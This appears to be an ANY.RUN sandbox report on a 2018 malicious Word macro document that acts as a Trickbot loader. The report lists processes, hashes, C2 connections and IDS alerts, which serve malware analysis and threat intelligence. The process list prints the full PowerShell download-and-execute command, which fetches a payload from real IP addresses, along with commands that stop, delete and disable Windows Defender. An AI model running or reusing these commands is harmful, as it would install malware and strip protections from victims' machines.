analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

OrderID-709.doc

Full analysis: https://app.any.run/tasks/ce7ee9ba-df07-4fa3-ae00-de2a7ca77e45
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 19:59:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
trojan
trickbot
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Windows, Template: Normal, Last Saved By: user, Revision Number: 23, Name of Creating Application: Microsoft Office Word, Total Editing Time: 28:00, Create Time/Date: Thu Nov 8 14:20:00 2018, Last Saved Time/Date: Thu Nov 8 15:35:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

CC7F4F6CB178FFDBCCA6F4660323251E

SHA1:

8DE58569C349E8432A800DE951392C1A0A5ED489

SHA256:

0162E369E7CF9EF05923B40BAE9F9C7D9C8EC803672FA9C8F60C5F723C7BDDD8

SSDEEP:

3072:jkwOaCYzoKh3N9ueZfcg3IDm6gty+5JUg:jy2oC99jSoVQg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3388)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1700)
      • cmd.exe (PID: 1388)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3388)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2824)
    • Downloads executable files from IP

      • powershell.exe (PID: 2824)
    • Application was dropped or rewritten from another process

      • tmp017.exe (PID: 2376)
      • tmp018.exe (PID: 2896)
      • tmp018.exe (PID: 2756)
    • Known privilege escalation attack

      • DllHost.exe (PID: 2792)
    • Changes settings of System certificates

      • tmp018.exe (PID: 2756)
    • Loads the Task Scheduler COM API

      • tmp018.exe (PID: 2756)
      • tmp018.exe (PID: 2896)
    • Uses SVCHOST.EXE for hidden code execution

      • tmp018.exe (PID: 2756)
    • Trickbot detected

      • tmp018.exe (PID: 2756)
    • Connects to CnC server

      • tmp018.exe (PID: 2756)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3008)
      • powershell.exe (PID: 2824)
      • tmp017.exe (PID: 2376)
      • powershell.exe (PID: 1612)
      • powershell.exe (PID: 2832)
      • tmp018.exe (PID: 2756)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3008)
      • tmp017.exe (PID: 2376)
      • tmp018.exe (PID: 2896)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2824)
      • tmp017.exe (PID: 2376)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 3832)
      • cmd.exe (PID: 3088)
      • cmd.exe (PID: 2484)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1264)
      • cmd.exe (PID: 2988)
    • Adds / modifies Windows certificates

      • tmp018.exe (PID: 2756)
    • Connects to unusual port

      • tmp018.exe (PID: 2756)
    • Removes files from Windows directory

      • tmp018.exe (PID: 2756)
    • Creates files in the Windows directory

      • tmp018.exe (PID: 2756)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3388)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:08 15:35:00
CreateDate: 2018:11:08 14:20:00
TotalEditTime: 28.0 minutes
Software: Microsoft Office Word
RevisionNumber: 23
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Пользователь Windows
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
65
Monitored processes
22
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe tmp017.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs tmp018.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs #TRICKBOT tmp018.exe svchost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3388"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\OrderID-709.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1700cmd /c powershell "'powershell ""<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,''%tmp%\tmp017.exe'');<#add info#>start-process ''%tmp%\tmp017.exe'';}try{swasi(''http://46.173.219.64/mald.fox'')}catch{swasi(''http://46.173.213.112/mald.fox'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp289.bat; start-process '%tmp%\tmp289.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3008powershell "'powershell ""<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,''C:\Users\admin\AppData\Local\Temp\tmp017.exe'');<#add info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp017.exe'';}try{swasi(''http://46.173.219.64/mald.fox'')}catch{swasi(''http://46.173.213.112/mald.fox'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp289.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp289.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1388cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp289.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2824powershell "<#start#>function swasi([string] $str1){(new-object system.net.webclient).downloadfile($str1,'C:\Users\admin\AppData\Local\Temp\tmp017.exe');<#add info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp017.exe';}try{swasi('http://46.173.219.64/mald.fox')}catch{swasi('http://46.173.213.112/mald.fox')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2376"C:\Users\admin\AppData\Local\Temp\tmp017.exe" C:\Users\admin\AppData\Local\Temp\tmp017.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3832/c sc stop WinDefendC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2120/c sc delete WinDefendC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1264/c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\system32\cmd.exetmp017.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3332sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 166
Read events
2 497
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
13
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
3388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2EEB.tmp.cvr
MD5:
SHA256:
3008powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JZTJZN7IRTKXO8FRU97E.temp
MD5:
SHA256:
2824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V40FS9K3J2YBGS2FZKB2.temp
MD5:
SHA256:
1612powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOYVQLAPXN1YXX2H0Q5.temp
MD5:
SHA256:
2832powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\85CR83IAFLKFDA74A42C.temp
MD5:
SHA256:
3388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF8207161178182528.TMP
MD5:
SHA256:
3388WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{41946B5C-91E3-4388-B85C-14ADC2DF0CCA}.tmp
MD5:
SHA256:
3388WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF30C125A9FE024791.TMP
MD5:
SHA256:
3388WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{706203FD-6143-4E35-A3CA-D21625456487}.tmp
MD5:
SHA256:
2756tmp018.exeC:\Windows\TEMP\Cab8AAD.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
5
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2824
powershell.exe
GET
200
46.173.219.64:80
http://46.173.219.64/mald.fox
RU
executable
517 Kb
suspicious
2756
tmp018.exe
GET
200
13.107.4.50:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
54.4 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2824
powershell.exe
46.173.219.64:80
Garant-Park-Internet Ltd
RU
suspicious
2756
tmp018.exe
198.46.162.10:447
ColoCrossing
US
suspicious
2756
tmp018.exe
190.145.74.84:449
Telmex Colombia S.A.
CO
suspicious
2756
tmp018.exe
176.58.123.25:443
ident.me
Linode, LLC
GB
suspicious
2756
tmp018.exe
13.107.4.50:80
www.download.windowsupdate.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
ident.me
  • 176.58.123.25
shared
www.download.windowsupdate.com
  • 13.107.4.50
whitelisted

Threats

PID
Process
Class
Message
2824
powershell.exe
Misc activity
ET INFO Packed Executable Download
2824
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2824
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2824
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2756
tmp018.exe
Not Suspicious Traffic
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
2756
tmp018.exe
A Network Trojan was detected
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)
2 ETPRO signatures available at the full report
No debug info